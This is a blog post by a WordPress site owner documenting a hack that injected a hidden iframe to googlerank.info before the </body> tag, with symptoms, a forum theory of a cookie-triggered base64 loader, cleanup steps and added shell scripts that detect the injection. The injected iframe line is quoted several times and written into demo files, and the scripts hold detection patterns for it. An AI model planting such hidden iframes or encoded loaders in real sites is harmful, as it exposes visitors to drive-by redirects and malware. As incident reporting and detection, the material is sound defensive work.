It came to my attention in the last few days that a handful of people had been experiencing some errors when viewing this site. Many visitors had the site return a 404 Page Not Found error page, while others had their browser crash completely. One individual even reported that their anti-virus software had thrown a red flag while visiting this site. My first instinct was that one of the site’s plugins was causing the errors, but upon further investigation, I have found what I believe to be the catalyst: googlerank.info.
Before I begin describing the issue, I want to state that I do not have a permanent fix (though I do have a temporary one). The purpose of this post is to document my findings for anybody who has experienced the symptoms or is interested in helping me find and fix the underlying issue. I’ve found very little documentation on this problem thus far, so I’m hoping to provide some clarity to all others who may be searching for it.
An <iframe> that points to googlerank.info has been found embedded in a handful of files associated with a WordPress installation. The <iframe> always appears at the very bottom of the source code, just before the </body> tag. It is possible that WordPress has a vulnerability that allows an unauthorized user to access and alter files, thereby compromising the security of the site owner as well as the site’s visitors.
Here are some of the symptoms to look out for:
- Your site loads for an instant, and quickly redirects to a 404 Page Not Found error page.
- While your site is loading, your status bar may read “Waiting for http://googlerank.info/…”.
- Viewing your site on older browsers crashes the browser. This has been mostly reported by users on IE6.
- Your anti-virus software may detect suspicious activity from your site.
I have not personally experienced the last 2 symptoms, so I unfortunately can’t provide any more details on them. If you’ve experienced any of these symptoms and are able to provide a screenshot or a copy of the error message, please contact me or leave a comment on this post.
Please also note that some of these symptoms occur inconsistently and only for a handful of visitors. I’ve encountered these problems no more than 2 or 3 times myself, but have heard about it enough times from visitors that it concerns me.
When I first set out to figure out why this site was bringing up errors, the first place I looked was the generated source code (right click > View Source). I slowly went through the markup line by line to see if anything was out of place and discovered this little nugget at the very bottom, right before the </body> tag:
<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>
How odd: an embedded hidden <iframe> loading a mysterious website called googlerank.info. Diving deeper into the investigation, I discovered that the same line of code was appearing in my WordPress Site Admin as well. As I continued to dig through the files on my server, I found that a handful of other files had somehow been altered to include the same bit of code.
Here is a complete list of files that the above code appeared in:
There are likely more, but those are the ones I found after searching for nearly an hour.
If you visit googlerank.info, you will find an imitation Google error page that says the following:
The requested URL /counter was not found on this server.
The page looks like this:
However, from time to time, the site won’t load, and instead, you will see this:
Note that Firefox reports that it couldn’t “establish a connection to the server at medicasntred.com”. The URL of the page is also no longer googlerank.info, and instead reads ‘http://medicasntred.com/check/upd.php?t=563’ (it is NOT suggested that you visit this URL). The Whois record for medicasntred.com can be found here.
Doing a quick Google search on the issue returns very few WordPress-related results. However, it seems as though many other open source platforms have been compromised in the same fashion.
Searching the WordPress Support Forums, however, turns up the following thread about WordPress 2.2.2 being hacked. In this thread, snorkelman describes very similar symptoms to those I’ve described above. He even offers a hypothesis for what was causing the issue:
The get_header() and get_footer() functions in general_template.php were modified. get_header() created a cookie called “yahg”, and get_footer() looked for it. If it found it, it sucked in some code from googlerank.info. The actual line it inserted was hidden by being base64 encoded, but it showed up on the site looking like this:
<iframe src=http://googlerank.info/counter style=display:none>
At the time of posting, snorkelman was running WordPress 2.2.2, which was known to be vulnerable and which prompted the WordPress folks to release a critical security update, version 2.3.3. The issue was shrugged off as having been caused by 2.2.2’s vulnerability and the topic was put to rest.
I’ve since resurfaced the thread by posting my situation in hopes that it will alert people that this hack seems to still be active in version 2.3.3.
From my research and exploration, here are a few things I’ve figured out about this problem:
- The vulnerability that the hack takes advantage of may have existed in the last few versions of WordPress as I found the code lingering in /wp-includes/js/tinymce/license.htm, which I believe no longer exists in WordPress’ installation, and has been replaced by license.txt instead. However, it could also simply be that the file was left over from past versions and was only altered recently.
- The hack was performed in the past 3 weeks, as that’s when I last updated the footer.php file of this current theme (as you’ll read below, re-uploading your files gets rid of the unwanted code). This also means that the vulnerability definitely exists in version 2.3.3, and was not simply carried forward from version 2.2.2, as I had done my upgrade when it was first released (which was more than 3 weeks ago).
- The hack seems to target primarily .htm and .php files that have a </body> tag in them. This is where the code is usually inserted.
- In response to snorkelman’s hypothesis above, I haven’t found anything in the get_header() function that creates a cookie named “yahg” and that passes it on to the get_footer() function, though that is a scary thought.
- I cleaned up my files yesterday and the code has not returned thus far. This is good news as it suggests that the code is not self-regenerating.
As noted at the beginning of this post, I don’t have a permanent fix for this issue. I believe the source of the solution exists within the WordPress code structure itself, which I haven’t looked extensively enough at to be able to diagnose. I do however have a temporary fix, which doesn’t guarantee that the issue will not resurface.
Find out if you’re a victim
First, see if you or your visitors have been experiencing any of the symptoms described above. Next, check the source code of your WordPress site (both the front-end and the back-end/site admin) to see if there is a hidden <iframe> embedded right before your </body> tag. If you see it there, it’s likely that a number of other files have also been tampered with.
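Checking the rendered source by hand only covers the pages you happen to load; a scan of the files on the server catches the copies in wp-admin, wp-includes and left-over files like license.htm as well. The script below is an added example, not code from the original post: it looks for the googlerank.info/medicasntred.com domains, for any iframe hidden with display:none or a 1x1 size, and for the eval(base64_decode(...)) and “yahg” cookie pattern snorkelman described. The directory layout, file names and file contents built by make_demo_tree are constructed for the demo; the base64_decode check is a heuristic that legitimate code can also trigger, so review those hits by hand.

```shell
#!/bin/sh
# Added example, not code from the original post: scan a WordPress tree for
# the hidden googlerank.info <iframe> and for the base64_decode()/"yahg"
# cookie pattern described in the forum thread. The directory layout, file
# names and file contents in make_demo_tree are constructed for the demo.

# scan_tree DIR
# Prints one "path:reason" line per suspicious .php/.htm/.html file under DIR.
scan_tree() {
    find "$1" -type f \( -name '*.php' -o -name '*.htm' -o -name '*.html' \) -print |
    while IFS= read -r f; do
        # 1. The domains seen in this incident.
        if grep -qiE 'googlerank\.info|medicasntred\.com' "$f"; then
            echo "$f:googlerank-iframe"
        # 2. Any iframe hidden by display:none or a 1x1 size, whatever it points at.
        elif grep -qiE '<iframe[^>]*(display:none|width=1|height=1)' "$f"; then
            echo "$f:hidden-iframe"
        fi
        # 3. eval(base64_decode(...)) or a check for the "yahg" cookie in PHP.
        #    Legitimate code also calls base64_decode, so review these hits by hand.
        if grep -qiE 'eval[[:space:]]*\([[:space:]]*base64_decode|_COOKIE\[.yahg' "$f"; then
            echo "$f:base64-eval"
        fi
    done
}

# scan_count DIR: number of findings, handy as an exit condition in a cron job.
scan_count() {
    scan_tree "$1" | wc -l | tr -d ' '
}

# make_demo_tree: build a small constructed WordPress-like tree and print its path.
make_demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/themes/mytheme" "$d/wp-includes/js/tinymce"
    # clean theme file
    printf '<html><body>hello</body></html>\n' > "$d/wp-content/themes/mytheme/index.php"
    # footer.php carrying the exact line quoted in the post
    printf '<div id="footer"></div>\n<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>\n</body></html>\n' \
        > "$d/wp-content/themes/mytheme/footer.php"
    # a left-over license.htm with a hidden iframe pointing somewhere else
    printf '<p>license</p><iframe src=http://example.invalid style=display:none></iframe></body>\n' \
        > "$d/wp-includes/js/tinymce/license.htm"
    # general-template.php with the cookie + base64 trick from the forum thread
    printf '<?php function get_footer() { if (isset($_COOKIE["yahg"])) eval(base64_decode("aGk=")); }\n' \
        > "$d/wp-includes/general-template.php"
    echo "$d"
}

# Usage: sh scan.sh /path/to/wordpress
# With no argument the script scans the constructed demo tree and removes it.
if [ -n "${1:-}" ]; then
    scan_tree "$1"
else
    demo=$(make_demo_tree)
    scan_tree "$demo"
    rm -rf "$demo"
fi
```

Run it against the web root as the web server's user (so it can read everything the attacker could write to); a non-empty result means the front-end check above is only the visible part of the problem.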
Update your files
The temporary solution to this issue is to simply overwrite the server’s files with your clean files. Follow these steps:
- Re-upload your theme’s footer.php file to your theme folder. Make sure that the footer.php file you have doesn’t have the line of code in it (in case you might have downloaded it from the server before).
- If you are editing your theme files from the WordPress site admin, go to your Theme Editor (Presentation > Theme Editor) and click on Footer on the right-hand side. Scroll to the bottom of the file and delete the following line of code:
<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>
- Download the latest version of WordPress from here.
- Copy the /wp-admin/ and /wp-includes/ folders into your server and overwrite the existing files. This will ensure that all your files are clean.
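Overwriting with a fresh download repairs files the attacker modified, but it cannot remove files the attacker added, nor files left over from an older release (license.htm is one the post found the code in). Before and after you overwrite, it is worth listing exactly how the server’s wp-admin/ and wp-includes/ differ from the clean copy. The script below is an added example, not code from the original post; CLEAN and SITE are assumed paths (the unpacked download and the server tree), and make_demo_trees builds constructed sample trees.

```shell
#!/bin/sh
# Added example, not code from the original post: compare the server's
# wp-admin/ and wp-includes/ trees with the same trees unpacked from a clean
# WordPress download. Overwriting with the release repairs modified files but
# cannot remove files the attacker added or files left over from an older
# release, so the "extra" lines are the ones to read. CLEAN and SITE are
# assumed paths; make_demo_trees builds constructed sample trees.

# diff_tree CLEAN SITE
# One line per difference, relative to the tree root:
#   modified:PATH   present in both, contents differ
#   extra:PATH      present on the server only
#   missing:PATH    present in the clean release only
diff_tree() {
    clean="$1"; site="$2"
    for sub in wp-admin wp-includes; do
        # LC_ALL=C keeps diff's messages in the English form parsed below.
        LC_ALL=C diff -rq "$clean/$sub" "$site/$sub" 2>/dev/null |
        while IFS= read -r line; do
            case "$line" in
                "Files "*" differ"|"Binary files "*" differ")
                    p=${line#*"iles $clean/"}        # drop "Files CLEAN/"
                    echo "modified:${p%% and *}" ;;  # keep the part before " and SITE/..."
                "Only in $site"*)
                    rest=${line#"Only in $site/"}    # "DIR: NAME"
                    echo "extra:${rest%%: *}/${rest#*: }" ;;
                "Only in $clean"*)
                    rest=${line#"Only in $clean/"}
                    echo "missing:${rest%%: *}/${rest#*: }" ;;
            esac
        done
    done
}

# diff_count CLEAN SITE: number of differences (0 means the two trees match).
diff_count() {
    diff_tree "$1" "$2" | wc -l | tr -d ' '
}

# make_demo_trees: build constructed clean/ and site/ trees, print the parent dir.
make_demo_trees() {
    base=$(mktemp -d)
    clean="$base/clean"; site="$base/site"
    for t in "$clean" "$site"; do
        mkdir -p "$t/wp-admin" "$t/wp-includes/js/tinymce"
        printf '<?php // admin index\n' > "$t/wp-admin/index.php"   # identical in both
    done
    printf '<?php function get_footer() { }\n' > "$clean/wp-includes/general-template.php"
    # server copy modified with the base64 trick
    printf '<?php function get_footer() { eval(base64_decode("aGk=")); }\n' > "$site/wp-includes/general-template.php"
    # release ships license.txt; the server still has the old license.htm
    printf 'license\n' > "$clean/wp-includes/js/tinymce/license.txt"
    printf 'license\n' > "$site/wp-includes/js/tinymce/license.htm"
    echo "$base"
}

# Usage: sh check.sh /path/to/clean-wordpress /path/to/site
# With no arguments the script compares the constructed demo trees and removes them.
if [ -n "${2:-}" ]; then
    diff_tree "$1" "$2"
else
    base=$(make_demo_trees)
    diff_tree "$base/clean" "$base/site"
    rm -rf "$base"
fi
```

After overwriting, run it again: every modified: line should be gone, and any remaining extra: line is a file the download did not ship, which is exactly what you want to look at (and delete if it is not yours) before declaring the site clean.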
I wrote this post in hopes of bringing some necessary attention to this issue. I’m fairly confident that I’m not the only one who has been affected by this. In fact, I’m pretty sure that many people who have been affected aren’t aware that their site has been compromised.
If you own a WordPress site yourself, I encourage you to do a quick check to make sure you’re clean. If you know others who own WordPress sites, please pass this on to them. If you own a site that has the ability to communicate to a broad audience that this issue may be relevant to, I encourage you to spread the word by writing about this or linking to this post.
Let’s hope we get to the bottom of this and can get a permanent fix in the next version of WordPress!
After some follow-up reading, I found the following article on another individual’s experience with WordPress being hacked. The post was written in November 2007, so the author was definitely using a version of WordPress that preceded 2.3.3. The description of the issue is actually very similar to what snorkelman had described in the WordPress forums (see above). Perhaps my case is an evolution of the same hack or possibly the result of only half of the hack working.
I’ll keep posting updates as I uncover more. Thanks to those who have begun spreading the word already.